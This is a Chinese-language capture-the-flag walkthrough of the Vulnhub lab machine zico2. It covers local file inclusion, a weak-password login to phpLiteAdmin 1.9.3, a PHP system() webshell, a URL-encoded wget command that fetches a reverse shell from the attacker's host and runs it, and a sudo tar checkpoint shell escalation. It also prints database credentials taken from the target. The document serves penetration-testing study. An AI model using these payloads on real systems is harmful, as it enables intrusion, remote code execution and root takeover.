0%

Vulnhub-zico2

难度:简单

靶机下载

0x01 信息收集

NMAP

image-20200829193335476

很容易引起人注意的链接。

image-20200829193426244

想的没错,果然存在文件包含

image-20200829193233555

尝试包含web日志失败后,我就去扫目录了- -

1
gobuster dir -u 'http://192.168.31.9/' -w ~/tools/Dict/SecLists/Discovery/Web-Content/big.txt -x php

image-20200829201131404

所以我们可以看到有一个dbadmin

image-20200829201244809

image-20200829201305591

有个数据库管理后台phpLiteadmin1.9.3,搜索了一下之后发现是存在一个远程代码执行漏洞的。但是需要通过验证,抱着试一试的心态用了弱密码admin..没想到就进去了……..

image-20200829204857906

Root:34kroot34

Zico:[email protected]

使用这两个数据库密码,并不能登陆ssh

0x02 漏洞利用

PHPLiteAdmin 1.9.3 - Remote PHP Code Injection

image-20200829201037819

跟着这里说的操作,先创建了一个phpinfo.php。创建一个新表后,输入默认字段,类型是text。 然后用之前找到的文件包含去包含它。

image-20200829201429148

image-20200829201633153

之后就尝试插入一句话好了,这里不加echo的话,就没有回显。如果用<?php eval($_POST[a])?>然后蚁剑什么的连接也行。但是据说这些也算是自动化工具,所以在oscp考试中估计是不能用的,所以还是用这个一句话吧。

1
<?php echo(system($_GET[a]))?>

image-20200829223405732

image-20200829223548125

之后在本地打开一个web服务。

1
python3 -m http.server 80
1
2
page=../../../../../usr/databases/eeee.php&a=wget%20http%3a%2f%2f192.168.31.153/php-shell-linux.php%20-O%20%2ftmp%2fshell.php
page=../../../../../usr/databases/eeee.php&a=php%20%2ftmp%2fshell.php

在burp中记得使用url编码特殊字符。这里我原本是想下到网站根目录的,但是没有写文件的权限。所以只能下到/tmp下,然后再用php -s执行。所以也可以不用传php的shell,也可以传bash的,然后bash 执行就好了。

成功反弹到shell。

image-20200829222729056

1
python -c 'import pty;pty.spawn("/bin/bash")'

因为不熟悉joomla的目录结构,所以去看了wordpress。

image-20200829222941387

查看/home/zico/wordpress/wp-config.php获得一个密码

image-20200829211605031

image-20200829211638202

image-20200829211653775

0x03 提权

zip

image-20200829211935393

image-20200829212015033

tar

1
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

image-20200829212313387

perf_swevent_init

image-20200829221332779

Linux Kernel 3.2.0-23/3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - ‘perf_swevent_init’ Local Privilege Escalation (3)

image-20200829221218457